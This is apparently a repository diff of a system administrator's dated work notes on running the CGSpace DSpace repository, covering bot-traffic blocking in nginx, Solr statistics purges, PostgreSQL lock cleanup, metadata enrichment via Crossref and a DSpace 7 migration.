# wc -l /tmp/2023-01-17-cgspace-ips.txt
129446 /tmp/2023-01-17-cgspace-ips.txt
```
- I ran the IPs through my `resolve-addresses-geoip2.py` script to resolve their ASNs/networks, then extracted some lists of data center ISPs by eyeballing them (Amazon, Google, Microsoft, Apple, DigitalOcean, HostRoyale, and a dozen others):
```console
$ csvgrep -c asn -r '^(8075|714|16276|15169|23576|24940|13238|32934|14061|12876|55286|203020|204287|7922|50245|6939|16509|14618)$' \
/tmp/2023-01-17-cgspace-ips.csv | csvcut -c network | \
sed 1d | sort | uniq > /tmp/networks-to-block.txt
$ wc -l /tmp/networks-to-block.txt
776 /tmp/networks-to-block.txt
```
- I added the list of networks to nginx's `bot-networks.conf` so they will all be heavily rate limited
- Looking at the Munin stats again I see the load has been extra high since yesterday morning:
![CPU week](/cgspace-notes/2023/01/cpu-week.png)
- But still, it's suspicious that there are so many PostgreSQL locks
- Looking at the Solr stats to check the hits over the last month (I actually skipped December because I was so busy):
- I see 31.148.223.10 is on ALFA TELECOM s.r.o. in Russia and it made 43,000 requests this month (and 400,000 more last month!)
- I see 18.203.245.60 is on Amazon and it uses weird user agents, different with each request
- I see 3.249.192.212 is on Amazon and it uses weird user agents, different with each request
- I see 34.244.160.145 is on Amazon and it uses weird user agents, different with each request
- I see 52.213.59.101 is on Amazon and it uses weird user agents, different with each request
- I see 91.209.8.29 is in Bulgaria on DGM EOOD and is low risk according to Scamlytics, but their user agent is all lower case and it's a data center ISP so nope
- I see 54.78.176.127 is on Amazon and it uses weird user agents, different with each request
- I see 54.246.128.111 is on Amazon and it uses weird user agents, different with each request
- I see 54.74.197.53 is on Amazon and it uses weird user agents, different with each request
- I see 52.16.103.133 is on Amazon and it uses weird user agents, different with each request
- I see 63.32.99.252 is on Amazon and it uses weird user agents, different with each request
- I see 176.34.141.181 is on Amazon and it uses weird user agents, different with each request
- I see 34.243.17.80 is on Amazon and it uses weird user agents, different with each request
- I see 34.240.206.16 is on Amazon and it uses weird user agents, different with each request
- I see 18.203.81.120 is on Amazon and it uses weird user agents, different with each request
- I see 176.97.210.106 is on Tube Hosting and is rated VERY BAD, malicious, scammy on everything I checked
- I see 79.110.73.54 is on ALFA TELCOM / Serverel and is using a different, weird user agent with each request
- There are too many to count... so I will purge these and then move on to user agents
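- A facet query along these lines surfaces the top IPs in the Solr statistics core (a sketch; the host, port, and date range are assumptions):

```console
$ curl -s 'http://localhost:8983/solr/statistics/select' \
    --data-urlencode 'q=time:[2022-12-01T00:00:00Z TO 2023-02-01T00:00:00Z]' \
    --data-urlencode 'rows=0' \
    --data-urlencode 'facet=true' \
    --data-urlencode 'facet.field=ip' \
    --data-urlencode 'facet.limit=30' \
    --data-urlencode 'wt=json' | jq '.facet_counts.facet_fields.ip'
```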
- I purged hits from those IPs:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 439185 hits from 31.148.223.10 in statistics
Purging 2151 hits from 18.203.245.60 in statistics
Purging 1990 hits from 3.249.192.212 in statistics
Purging 1975 hits from 34.244.160.145 in statistics
Purging 1969 hits from 52.213.59.101 in statistics
Purging 2540 hits from 91.209.8.29 in statistics
Purging 1624 hits from 54.78.176.127 in statistics
Purging 1236 hits from 54.74.197.53 in statistics
Purging 1327 hits from 54.246.128.111 in statistics
Purging 1108 hits from 52.16.103.133 in statistics
Purging 1045 hits from 63.32.99.252 in statistics
Purging 999 hits from 176.34.141.181 in statistics
Purging 997 hits from 34.243.17.80 in statistics
Purging 985 hits from 34.240.206.16 in statistics
Purging 862 hits from 18.203.81.120 in statistics
Purging 1654 hits from 176.97.210.106 in statistics
Purging 1628 hits from 51.81.193.200 in statistics
Purging 1020 hits from 79.110.73.54 in statistics
Purging 842 hits from 35.153.105.213 in statistics
Purging 1689 hits from 54.164.237.125 in statistics
Total number of bot hits purged: 466826
```
- Looking at user agents in Solr statistics from 2022-12 and 2023-01 I see some weird ones:
- `azure-logic-apps/1.0 (workflow e1f855704d6543f48be6205c40f4083f; version 08585300079823949478) microsoft-flow/1.0`
- `Gov employment data scraper ([[your email]])`
- `Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?LinkID=304225)`
- `crownpeak`
- `Mozilla/5.0 (compatible)`
- Also, a ton of them are lower case, which I've never seen before... it might be possible, but looks super fishy to me:
- `mozilla/5.0 (x11; ubuntu; linux x86_64; rv:84.0) gecko/20100101 firefox/86.0`
- `mozilla/5.0 (macintosh; intel mac os x 11_3) applewebkit/537.36 (khtml, like gecko) chrome/89.0.4389.90 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64; rv:86.0) gecko/20100101 firefox/86.0`
- `mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/90.0.4430.93 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/92.0.4515.159 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/88.0.4324.104 safari/537.36`
- `mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36`
- I purged some of those:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
Purging 1658 hits from azure-logic-apps\/1.0 in statistics
Purging 948 hits from Gov employment data scraper in statistics
Purging 786 hits from Microsoft\.Data\.Mashup in statistics
Purging 303 hits from crownpeak in statistics
Purging 332 hits from Mozilla\/5.0 (compatible) in statistics
Total number of bot hits purged: 4027
```
- Then I ran all system updates on the server and rebooted it
- Hopefully this clears the locks and the nginx mitigation helps with the load from non-human hosts in large data centers
- I need to re-work how I'm doing this whitelisting and blacklisting... it's way too complicated now
- Export entire CGSpace to check Initiative mappings, and add nineteen...
- Start a harvest on AReS
## 2023-01-18
- I'm looking at all the ORCID identifiers in the database, which seem to be way more than I realized:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=247) to /tmp/2023-01-18-orcid-identifiers.txt;
COPY 4231
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/2023-01-18-orcid-identifiers.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-01-18-orcids.txt
$ wc -l /tmp/2023-01-18-orcids.txt
4518 /tmp/2023-01-18-orcids.txt
```
- Then I resolved them from ORCID and updated them in the database:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2023-01-18-orcids.txt -o /tmp/2023-01-18-orcids-names.txt -d
$ ./ilri/update-orcids.py -i /tmp/2023-01-18-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
- Then I updated the controlled vocabulary
- CGSpace became unresponsive in the afternoon, with a high number of locks, but surprisingly low CPU usage:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
83 dspaceApi
7829 dspaceWeb
```
- In the DSpace logs I see some weird SQL messages, so I decided to restart PostgreSQL and Tomcat 7...
- I hope this doesn't cause some issue with in-progress workflows...
- I see another user on Cox in the US (98.186.216.144) crawling and scraping XMLUI with Python
- I will add python to the list of bad bot user agents in nginx
- While looking into the locks I see some potential Java heap issues
- Indeed, I see two out of memory errors in Tomcat's journal:
```console
tomcat7[310996]: java.lang.OutOfMemoryError: Java heap space
tomcat7[310996]: Jan 18, 2023 1:37:03 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
```
- Which explains why the locks went down to normal numbers as I was watching... (because Java crashed)
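- For the record, those errors are easy to find in the journal, assuming Tomcat runs as the `tomcat7` systemd unit:

```console
# journalctl -u tomcat7 --since yesterday | grep -i OutOfMemoryError
```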
## 2023-01-19
- Update a bunch of ORCID identifiers, Initiative mappings, and regions on CGSpace
- So it seems an IFPRI user got caught up in the blocking I did yesterday
- Their ISP is Comcast...
- I need to re-work the ASN blocking on nginx, but for now I will just get the ASNs again minus Comcast:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS714 \
https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS15169 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS32934 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS16509 \
https://asn.ipinfo.app/api/text/list/AS14618
$ cat AS* | sort | uniq | wc -l
18179
$ cat /tmp/AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
$ wc -l /tmp/networks.txt
5872 /tmp/networks.txt
```
## 2023-01-20
- A lot of work on CGSpace metadata (ORCID identifiers, regions, and Initiatives)
- I noticed that MEL and CGSpace are using slightly different vocabularies for SDGs so I sent an email to Salem and Sara
## 2023-01-21
- Export the Initiatives community again to perform collection mappings and country/region fixes
## 2023-01-22
- There has been a high load on the server for a few days, currently 8.0... and I've been seeing some PostgreSQL locks stuck all day:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
11 dspaceApi
28 dspaceCli
981 dspaceWeb
```
- Looking at the locks I see they are from this morning at 5:00 AM, which is the `dspace checker-email` script
- Last week I disabled the one that runs at 4:00 AM, but I guess I will experiment with disabling this one too...
- Then I killed the PIDs of the locks
```console
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | less -S
...
$ ps auxw | grep 18986
postgres 1429108 1.9 1.5 3359712 508148 ? Ss 05:00 13:40 postgres: 12/main: dspace dspace 127.0.0.1(18986) SELECT
```
- Also, I checked the age of the locks and killed anything over 1 day:
```console
$ psql < locks-age.sql | grep days | less -S
```
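- Something like this would terminate any dspaceCli backend that hasn't changed state in over a day (a sketch, not the contents of `locks-age.sql`):

```console
$ psql -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE application_name = 'dspaceCli' AND state_change < now() - interval '1 day';"
```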
- Then I ran all updates on the server and restarted it...
- Salem responded to my question about the SDG mismatch between MEL and CGSpace
- We agreed to use a version based on the text of [this site](http://metadata.un.org/sdg/?lang=en)
- Salem is having issues with some REST API submission / updates
- I updated DSpace Test with a recent CGSpace backup and created a super admin user for him to test
- Clean and normalize fifty-eight IFPRI records for batch import to CGSpace
- I did a duplicate check and found six, so that's good!
- I exported the entire CGSpace to check for missing Initiative mappings
- Then I exported the Initiatives community to check for missing regions
- Then I ran the script to check for missing ORCID identifiers
- Then *finally*, I started a harvest on AReS
## 2023-01-23
- Salem found that you can actually harvest everything in DSpace 7 using the [`discover/browses` endpoint](https://dspace7test.ilri.org/server/api/discover/browses/title/items?page=1&size=100)
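- For example, fetching one page of 100 items looks roughly like this (a sketch, assuming the HAL response embeds results under `_embedded.items`):

```console
$ curl -s 'https://dspace7test.ilri.org/server/api/discover/browses/title/items?page=0&size=100' \
    | jq -r '._embedded.items[] | .handle + " " + .name'
```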
- Exported CGSpace again to examine and clean up a bunch of stuff like ISBNs in the ISSN field, DOIs in the URL field, dataset URLs in the DOI field, normalized a bunch of publisher places, fixed some countries and regions, fixed some licenses, etc
- I noticed that we still have "North America" as a region, but according to UN M.49 that is the continent, which comprises "Northern America" the region, so I will update our controlled vocabularies and all existing entries
- I imported changes to 1,800 items
- When it finished five hours later I started a harvest on AReS
## 2023-01-24
- Proof and upload seven items for the Rethinking Food Markets Initiative for IFPRI
- Export CGSpace to do some minor cleanups, Initiative collection mappings, and region fixes
- I also added "CGIAR Trust Fund" to all items with an Initiative in `cg.contributor.initiative`
## 2023-01-25
- Oh shit, the import last night ran for twelve hours and then died:
```console
Error committing changes to database: could not execute statement
Aborting most recent changes.
```
- I re-submitted a smaller version without the CGIAR Trust Fund changes for now just so we get the regions and other fixes
- Do some work on SAPLING issues for CGSpace, sending a large list of issues we found to the MEL team for items they submitted
- Abenet noticed that the number of items in the Initiatives community appears to have dropped by about 2,000 in the XMLUI
- We looked on AReS and all the items are still there
- I looked in the DSpace log and see around 2,000 messages like this:
```console
2023-01-25 07:14:59,529 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: c9fac1f2-6b2b-4941-8077-40b7b5c936b6 message:missing required field: epersonID
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
at org.dspace.core.Context.dispatchEvents(Context.java:455)
at org.dspace.core.Context.commit(Context.java:424)
at org.dspace.core.Context.complete(Context.java:380)
at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- I filed a ticket with Atmire to ask them
- For now I just did a light Discovery reindex (not the full one) and all the items appeared again
- Submit an issue to MEL GitHub regarding the capitalization of CRPs: https://github.com/CodeObia/MEL/issues/11133
- I talked to Salem and he said that this is a legacy thing from when CGSpace was using ALL CAPS for most of its metadata. I provided him with [our current controlled vocabulary for CRPs](https://ilri.github.io/cgspace-submission-guidelines/cg-contributor-crp/cg-contributor-crp.txt) and he will update it in MEL.
- On that note, Peter and Abenet and I realized that we still have an old field `cg.subject.crp` with about 450 values in it, but it has not been used for a few years (they are using the old ALL CAPS CRPs)
- I exported this list of values to lowercase them and move them to `cg.contributor.crp`
- Even if some items end up with multiple CRPs, they will get de-duplicated when I remove duplicate values soon
```console
$ ./ilri/fix-metadata-values.py -i /tmp/2023-01-25-fix-crp-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.crp -t correct
$ ./ilri/move-metadata-values.py -i /tmp/2023-01-25-move-crp-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.crp -t cg.contributor.crp
```
- After fixing and moving them all, I deleted the `cg.subject.crp` field from the metadata registry
- I realized a smarter way to update the text lang attributes of metadata would be to restrict the query to items that are in the archive and not withdrawn:
```sql
UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn) AND (text_lang IS NULL OR text_lang IN ('en', ''));
```
- I tried that in a transaction and it hung, so I canceled it and rolled back
- I see some PostgreSQL locks attributed to `dspaceApi` that were started at `2023-01-25 13:40:04.529087+01` and haven't changed since then (that's eight hours ago)
- I killed the pid...
- There were also some locks owned by `dspaceWeb` that were nine and four hours old, so I killed those too...
- Now Maria was able to archive one submission of hers that was hanging all afternoon, but I still can't run the update on the text langs...
- Export entire CGSpace to do Initiative mappings again
- Started a harvest on AReS
## 2023-01-26
- Export entire CGSpace to do some metadata cleanup on various fields
- I also added "CGIAR Trust Fund" to all items in the Initiatives community
## 2023-01-27
- Export a list of affiliations in the Initiatives community for Peter, trying a new method to avoid exporting *everything* from PostgreSQL:
```console
$ dspace metadata-export -i 10568/115087 -f /tmp/2023-01-27-initiatives.csv
$ csvcut -c 'cg.contributor.affiliation[en_US]' 2023-01-27-initiatives.csv \
| sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d' \
| sort | uniq -c | sort -h \
| awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
| sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/' \
> /tmp/2023-01-27-initiatives-affiliations.csv
```
- The first sed command drops the CSV header, strips the quotes, splits multiple values on "||", and deletes empty lines
- The awk command sets the field separator to the leading whitespace and count from `uniq -c` so we can extract just the affiliation name as the second "field", ie:
```console
...
309 International Center for Agricultural Research in the Dry Areas
412 International Livestock Research Institute
```
- The second sed command adds the CSV header and quotes back
- I did the same for authors and donors and send them to Peter to make corrections
## 2023-01-28
- Daniel from the Alliance said they are getting an HTTP 401 when trying to submit items to CGSpace via the REST API
## 2023-01-29
- Export the entire CGSpace to do Initiatives collection mappings
- I was thinking about a way to use Crossref's API to enrich our data, for example checking registered DOIs for license information, publishers, etc
- Turns out I had already written `crossref-doi-lookup.py` last year, and it works
- I exported a list of all DOIs without licenses from CGSpace, minus the CIFOR ones because I know they aren't registered on Crossref, which is about 11,800 DOIs:
```console
$ csvcut -c 'cg.identifier.doi[en_US]' ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv \
| csvgrep -c 'cg.identifier.doi[en_US]' -r '.*cifor.*' -i \
| sed 1d > /tmp/2023-01-29-dois.txt
$ wc -l /tmp/2023-01-29-dois.txt
11819 /tmp/2023-01-29-dois.txt
$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-01-29-dois.txt -o /tmp/crossref-results.csv
$ csvcut -c 'id,cg.identifier.doi[en_US]' ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv \
| sed -e 's_https://doi.org/__g' -e 's_https://dx.doi.org/__g' -e 's/cg.identifier.doi\[en_US\]/doi/' \
> /tmp/cgspace-temp.csv
$ csvjoin -c doi /tmp/cgspace-temp.csv /tmp/crossref-results.csv \
| csvgrep -c license -r 'creative' \
| sed '1s/license/dcterms.license[en_US]/' \
| csvcut -c id,license > /tmp/2023-01-29-new-licenses.csv
```
- The above was done with just 5,000 DOIs because it was taking a long time, but after the last step I imported into OpenRefine to clean up the license URLs
- Then I imported 635 new licenses to CGSpace woooo
- After checking the remaining 6,500 DOIs there were another 852 new licenses, woooo
- Peter finished the corrections on affiliations, authors, and donors
- I quickly checked them and applied each on CGSpace
- Start a harvest on AReS
## 2023-01-30
- Run the thumbnail fixer tasks on the Initiatives collections:
```console
$ chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails 10568/115087 | tee -a /tmp/FixLowQualityThumbnails.log
$ grep -c remove /tmp/FixLowQualityThumbnails.log
16
$ chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixJpgJpgThumbnails 10568/115087 | tee -a /tmp/FixJpgJpgThumbnails.log
$ grep -c replacing /tmp/FixJpgJpgThumbnails.log
13
```
## 2023-01-31
- Someone from the Google Scholar team contacted us to ask why Googlebot is blocked from crawling CGSpace
- I said that I blocked them because they crawl haphazardly and we had high load during PRMS reporting
- Now I will unblock their ASN (AS15169) in nginx...
- I urged them to be smarter about crawling since we're a small team and they are a huge engineering company
- I removed their ASN and regenerated my list from 2023-01-17:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS714 \
https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS32934 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS16509 \
https://asn.ipinfo.app/api/text/list/AS14618
$ cat AS* | sort | uniq | wc -l
17134
$ cat /tmp/AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
```
- Then I updated nginx...
- Re-run the scripts to delete duplicate metadata values and update item timestamps that I originally used in 2022-11
- This was about 650 duplicate metadata values...
- Exported CGSpace to do some metadata interrogation in OpenRefine
- I looked at items that are set as `Limited Access` but have Creative Commons licenses
- I filtered ~150 that had DOIs and checked them on the Crossref API using `crossref-doi-lookup.py`
- Of those, only about five or so were incorrectly marked as having Creative Commons licenses, so I set those to copyrighted
- For the rest, I set them to Open Access
- Start a harvest on AReS
<!-- vim: set sw=2 ts=2: -->

423
content/posts/2023-02.md Normal file

@ -0,0 +1,423 @@
---
title: "February, 2023"
date: 2023-02-01T10:57:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-02-01
- Export CGSpace to cross check the DOI metadata with Crossref
- I want to try to expand my use of their data to journals, publishers, volumes, issues, etc...
<!--more-->
- First, extract a list of DOIs for use with `crossref-doi-lookup.py`:
```console
$ csvcut -c 'cg.identifier.doi[en_US]' ~/Downloads/2023-02-01-cgspace.csv \
| csvgrep -c 1 -m 'doi.org' \
| csvgrep -c 1 -m ' ' -i \
| csvgrep -c 1 -r '.*cifor.*' -i \
| sed 1d > /tmp/2023-02-01-dois.txt
$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-02-01-dois.txt -o ~/Downloads/2023-01-31-crossref-results.csv -d
```
- Then extract the ID, DOI, journal, volume, issue, publisher, etc from the CGSpace dump and rename the `cg.identifier.doi[en_US]` to `doi` so we can join on it with the Crossref results file:
```console
$ csvcut -c 'id,cg.identifier.doi[en_US],cg.journal[en_US],cg.volume[en_US],cg.issue[en_US],dcterms.publisher[en_US],cg.number[en_US],dcterms.license[en_US]' ~/Downloads/2023-02-01-cgspace.csv \
| csvgrep -c 'cg.identifier.doi[en_US]' -r '.*cifor.*' -i \
| sed -e '1s/cg.identifier.doi\[en_US\]/doi/' \
-e 's_https://doi.org/__g' \
-e 's_https://dx.doi.org/__g' \
> /tmp/2023-02-01-cgspace-doi-metadata.csv
$ csvjoin -c doi /tmp/2023-02-01-cgspace-doi-metadata.csv ~/Downloads/2023-02-01-crossref-results.csv > /tmp/2023-02-01-cgspace-crossref-check.csv
```
- And import into OpenRefine for analysis and cleaning
- I just noticed that Crossref also has types, so we could use that in the future too!
- I got a few corrections after examining manually, but I didn't manage to identify any patterns that I could use to do any automatic matching or cleaning
## 2023-02-05
- Normalize text lang attributes in PostgreSQL, run a quick Discovery index, and then export CGSpace to check Initiative mappings and countries/regions
- Run all system updates on CGSpace (linode18) and reboot it
## 2023-02-06
- Peter said that a new Initiative was approved last month so we need to add it to CGSpace: `Fragility, Conflict, and Migration`
- There is lots of discussion about the "issue date" versus "available date" with Enrico and IFPRI, after lots of feedback from the PRMS QA
- I filed [an issue on CG Core to propose using `dcterms.available` as an optional field to indicate the online date](https://github.com/AgriculturalSemantics/cg-core/issues/43)
## 2023-02-07
- IFPRI's web developer Tony managed to get his Drupal harvester to have a useful user agent:
```console
54.x.x.x - - [06/Feb/2023:10:10:32 +0100] "POST /rest/items/find-by-metadata-field?limit=%22100&offset=0 HTTP/1.1" 200 58855 "-" "IFPRI drupal POST harvester"
```
- He also noticed that there is no pagination on POST requests to `/rest/items/find-by-metadata-field`, and that he needs to increase his timeout for requests that return 100+ results, ie:
```console
$ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.actionArea", "value":"Systems Transformation", "language": "en_US"}'
```
- I need to ask on the DSpace Slack about this POST pagination
- Abenet and Udana noticed that the Handle server was not running
- Looking in the `error.log` file I see that the service is complaining about a lock file being present
- This is because Linode had to do emergency maintenance on the VM host this morning and the Handle server didn't shut down properly
- I'm having an issue with `poetry update` so I spent some time debugging and filed [an issue](https://github.com/python-poetry/poetry/issues/7482)
- Proof and import nine items for the Digital Innovation Initiative for IFPRI
- There were only some minor issues in the metadata
- I also did a duplicate check with `check-duplicates.py` just in case
- I did some minor updates on csv-metadata-quality
- First, to reduce warnings on non-SPDX licenses like "Copyrighted; all rights reserved" and "Other" since they are very common for us and I'm sick of seeing the warnings
- Second, to skip whitespace and newline fixes on the abstract field since so many times they are intended
## 2023-02-08
- Make some edits to IFPRI records requested by Jawoo and Leigh
- Help Alessandra upload a last minute report for SAPLING
- Proof and upload twenty-seven IFPRI records to CGSpace
- It's a good thing I did a duplicate check because I found three duplicates!
- Export CGSpace to update Initiative mappings and country/region mappings
- Then start a harvest on AReS
## 2023-02-09
- Do some minor work on the CSS on the DSpace 7 test
## 2023-02-10
- I noticed a large number of PostgreSQL locks from dspaceWeb on CGSpace:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
2033 dspaceWeb
```
- Looking at the lock age, I see some already 1 day old, including this curious query:
```console
select nextval ('public.registrationdata_seq')
```
- I killed all locks that were more than a few hours old
- Export CGSpace to update Initiative collection mappings
- Discuss adding `dcterms.available` to the submission form
- I also looked in the `dcterms.description` field on CGSpace and found ~1,500 items where there is an indication of an online published date
- Using some facets in OpenRefine I narrowed down the ones mentioning "online" and then extracted the dates to a new column:
```console
cells['dcterms.description[en_US]'].value.replace(/.*?(\d+{2}) ([a-zA-Z]+) (\d+{2}).*/,"$3-$2-$1")
```
- Then to handle formats like "2022-April-26" and "2021-Nov-11" I used some replacement GRELs (note the order so we don't replace short patterns in longer strings prematurely):
```console
value.replace("January","01").replace("February","02").replace("March","03").replace("April","04").replace("May","05").replace("June","06").replace("July","07").replace("August","08").replace("September","09").replace("October","10").replace("November","11").replace("December","12")
value.replace("Jan","01").replace("Feb","02").replace("Mar","03").replace("Apr","04").replace("May","05").replace("Jun","06").replace("Jul","07").replace("Aug","08").replace("Sep","09").replace("Oct","10").replace("Nov","11").replace("Dec","12")
```
- This covered about 1,300 items, then I did about 100 more, messier ones with some more regex wrangling
- I removed the `dcterms.description[en_US]` field from items where I updated the dates
- Then I added `dcterms.available` to the submission form and the item view
- We need to announce this to the editors
## 2023-02-13
- Export CGSpace to do some metadata quality checks
- I added CGIAR Trust Fund as a donor to some new Initiative outputs
- I moved some abstracts from the description field
- I moved some version information to the `cg.edition` field
## 2023-02-14
- The PRMS team in Colombia sent some questions about countries on CGSpace
- I had to fix some that were clearly wrong, but there is also a difference between CGSpace and MEL because we mostly use iso-codes, and MEL uses the UN M.49 list
- Then I re-ran the country code tagger from cgspace-java-helpers, forcing the update on all items in the Initiatives community
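- The plain invocation of that curation task is roughly this (this sketch doesn't show how I forced the update):

```console
$ dspace curate -t countrycodetagger -i 10568/115087
```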
- Remove Alliance research levers from `cg.contributor.crp` field after discussing with Daniel and Maria
- This was a mistake on TIP's part, and there is no direct mapping between research levers and CRPs
- I exported CGSpace to check Initiative collection mappings, regions, and licenses
- Peter told me that all CGIAR blog posts for the Initiatives should be CC-BY-4.0, and I see the logo at the bottom in light gray!
- I had previously missed that and removed some licenses for blog posts
- I checked cgiar.org, ifpri.org, icarda.org, iwmi.cgiar.org, irri.org, etc and corrected a handful
- Start a harvest on AReS
## 2023-02-15
- Work on rebasing my local DSpace 7 dev branches on top of the latest 7.5-SNAPSHOT
- It seems the issues I had with the `dspace submission-forms-migrate` tool in [August, 2022]({{< relref "2022-08.md" >}}) were fixed
- I imported a fresh PostgreSQL snapshot from CGSpace and then removed the Atmire migrations and ran the new migrations as I originally noted in [March, 2022]({{< relref "2022-03.md" >}}), and is pointed out in the [DSpace 7 upgrade notes](https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace)
- Now I get a new error:
```console
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
localhost/dspace7= \q
$ ./bin/dspace database migrate ignored
...
CREATE INDEX resourcepolicy_action_idx ON resourcepolicy(action_id)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.handleException(DefaultSqlScriptExecutor.java:275)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:222)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.execute(DefaultSqlScriptExecutor.java:126)
at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.executeOnce(SqlMigrationExecutor.java:69)
at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.lambda$execute$0(SqlMigrationExecutor.java:58)
